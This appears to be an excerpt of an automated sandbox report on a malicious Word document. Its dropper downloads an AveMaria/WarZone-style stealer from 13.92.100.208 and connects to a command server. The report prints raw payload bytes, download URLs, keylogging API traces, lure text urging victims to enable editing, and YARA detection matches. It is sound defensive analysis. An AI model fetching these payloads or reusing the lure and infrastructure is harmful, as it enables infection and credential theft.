            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 28 Sep 2021 19:17:36 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Tue, 28 Sep 2021 06:16:15 GMTETag: "9ba00-5cd08269fe9c0"Accept-Ranges: bytesContent-Length: 637440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2e b3 52 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 07 00 00 b0 02 00 00 00 00 00 f2 26 07 00 00 20 00 00 00 40 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 26 07 00 4f 00 00 00 00 40 07 00 20 ad 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 06 07 00 00 20 00 00 00 08 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 ad 02 00 00 40 07 00 00 ae 02 00 00 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 26 07 00 00 00 00 00 48 00 00 00 02 00 05 00 04 40 00 00 0c a6 02 00 03 00 00 00 0f 00 00 06 10 e6 02 00 90 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 01 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 2b 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 02 00 00 11 00 19 8d 12 00 00 01 0a 2b 00 06 2a 22 02 28 18 00 00 0a 00 2a 5e 02 14 7d 01 00 00 04 02 28 19 00 00 0a 00 00 02 28 08 00 00 06 00 2a 00 00 00 13 30 02 00 1d 00 00 00 03 00 00 11 00 16 0a 2b 0f 73 0c 00 00 06 28 1a 00 00 0a 00 06 17 58 0a 06 17 fe 04 0b 07 2d e9 2a 00 00 00 13 30 02 00 2b 00 00 00 04 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 1b 00 00 0a 00 00 02 03 28 1c 00 00 0a 00 2a 00 13 30 04 00 31 01 00 00 01 00 00 11 00 02 73 1d 00 00 0a 7d 03 00 00 04 02 28 1e 00 00 0a 00 02 7b 03 00 00 04 20 85 00 00 00 1f 33 73 1f 00 00 0a 6f 20 00 00 0a 00 02 7b 03 00 00 04 72 41 00 00 70 6f 21 00 00 0a 00 02 7b 03 00 00 04 1f 4b 1f 17 73 22 00 00 0a 6f 23 00 00 0a 00 02 7b
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 28 Sep 2021 19:17:41 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Tue, 28 Sep 2021 06:16:15 GMTETag: "9ba00-5cd08269fe9c0"Accept-Ranges: bytesContent-Length: 637440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2e b3 52 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 07 00 00 b0 02 00 00 00 00 00 f2 26 07 00 00 20 00 00 00 40 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 26 07 00 4f 00 00 00 00 40 07 00 20 ad 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 06 07 00 00 20 00 00 00 08 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 ad 02 00 00 40 07 00 00 ae 02 00 00 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 26 07 00 00 00 00 00 48 00 00 00 02 00 05 00 04 40 00 00 0c a6 02 00 03 00 00 00 0f 00 00 06 10 e6 02 00 90 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 01 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 2b 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 02 00 00 11 00 19 8d 12 00 00 01 0a 2b 00 06 2a 22 02 28 18 00 00 0a 00 2a 5e 02 14 7d 01 00 00 04 02 28 19 00 00 0a 00 00 02 28 08 00 00 06 00 2a 00 00 00 13 30 02 00 1d 00 00 00 03 00 00 11 00 16 0a 2b 0f 73 0c 00 00 06 28 1a 00 00 0a 00 06 17 58 0a 06 17 fe 04 0b 07 2d e9 2a 00 00 00 13 30 02 00 2b 00 00 00 04 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 1b 00 00 0a 00 00 02 03 28 1c 00 00 0a 00 2a 00 13 30 04 00 31 01 00 00 01 00 00 11 00 02 73 1d 00 00 0a 7d 03 00 00 04 02 28 1e 00 00 0a 00 02 7b 03 00 00 04 20 85 00 00 00 1f 33 73 1f 00 00 0a 6f 20 00 00 0a 00 02 7b 03 00 00 04 72 41 00 00 70 6f 21 00 00 0a 00 02 7b 03 00 00 04 1f 4b 1f 17 73 22 00 00 0a 6f 23 00 00 0a 00 02 7b
            Source: global trafficHTTP traffic detected: GET /doc/doc.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.92.100.208Connection: Keep-Alive
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_004027D3 URLDownloadToFileW,ShellExecuteW,
            Source: Joe Sandbox ViewASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
            Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
            Source: Joe Sandbox ViewIP Address: 152.67.253.163 152.67.253.163
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.67.253.163:5300
            Source: powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmpString found in binary or memory: httP://13.92.1
            Source: powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmpString found in binary or memory: httP://13.92.100
            Source: powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmpString found in binary or memory: httP://13.92.100.208/do
            Source: powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmpString found in binary or memory: httP://13.92.100.208/doc/doc.
            Source: powershell.exe, 00000005.00000002.429199796.00000000002AF000.00000004.00000020.sdmpString found in binary or memory: httP://13.92.100.208/doc/doc.exe
            Source: powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmpString found in binary or memory: httP://13.92.100.208/doc/doc.exePE
            Source: powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmpString found in binary or memory: http://13.92.100.208
            Source: powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmpString found in binary or memory: http://13.92.100.208/doc/doc.exe
            Source: powershell.exe, 00000003.00000002.427543124.00000000022B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.430729698.00000000023D0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
            Source: powershell.exe, 00000003.00000002.426929590.000000000022F000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: powershell.exe, 00000003.00000002.426929590.000000000022F000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.coL
            Source: powershell.exe, 00000003.00000002.426929590.000000000022F000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/
            Source: doc.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{023FDC9E-1C42-46A7-9085-716C914A6086}.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040562F setsockopt,recv,recv,
            Source: global trafficHTTP traffic detected: GET /doc/doc.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.92.100.208Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /doc/doc.exe HTTP/1.1Host: 13.92.100.208Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: unknownTCP traffic detected without corresponding DNS query: 13.92.100.208
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_004089D5 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040902E DefWindowProcA,GetRawInputData,GetRawInputData,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrcpyW,CreateFileW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,CloseHandle,PostQuitMessage,RegisterRawInputDevices,

            E-Banking Fraud:

            barindex
            Yara detected AveMaria stealerShow sources
            Source: Yara matchFile source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 9.2.doc.exe.23ecb30.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
            Source: Screenshot number: 4Screenshot OCR: Enable Editing when opening. 0 Page:l of 2 , Words:19 I 3 I N@m 13 ;a 10096 G) FI G) ,, .
            Source: Screenshot number: 12Screenshot OCR: Enable Editing when opening. ii: ^ Double-click to Activate Contents Package S
            Powershell drops PE fileShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\doc.exeJump to dropped file
            Microsoft Office creates scripting filesShow sources
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScTJump to behavior
            Office process drops PE fileShow sources
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exeJump to dropped file
            .NET source code contains very large stringsShow sources
            Source: doc[1].exe.0.dr, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: doc.exe.5.dr, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: maBdogbw.exe.9.dr, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 9.0.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 9.2.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 12.2.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 12.0.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 13.2.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 13.0.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 14.2.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 14.0.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Found suspicious RTF objectsShow sources
            Source: abdtfhgXgeghDh.ScTStatic RTF information: Object: 0 Offset: 00000965h abdtfhgXgeghDh.ScT
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 9_2_001F2000
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 9_2_001F25C8
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 9_2_001F4AEF
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 9_2_001F3AE2
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 9_2_001F4B00
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 9_2_02175A18
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 9_2_021766CA
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 9_2_021748AA
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_00411BF8
            Source: doc[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: doc.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: maBdogbw.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe 30FAB10AA23C7DBB0B66B3B0491582F2BB6930E7BCE11A078C3093AE4B40DC7E
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\doc.exe 30FAB10AA23C7DBB0B66B3B0491582F2BB6930E7BCE11A078C3093AE4B40DC7E
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\maBdogbw.exe 30FAB10AA23C7DBB0B66B3B0491582F2BB6930E7BCE11A078C3093AE4B40DC7E
            Source: C:\Users\user\AppData\Roaming\doc.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\doc.exeMemory allocated: 76E90000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\doc.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\doc.exeMemory allocated: 76E90000 page execute and read and write
            Source: 9.2.doc.exe.23ecb30.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 9.2.doc.exe.23ecb30.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
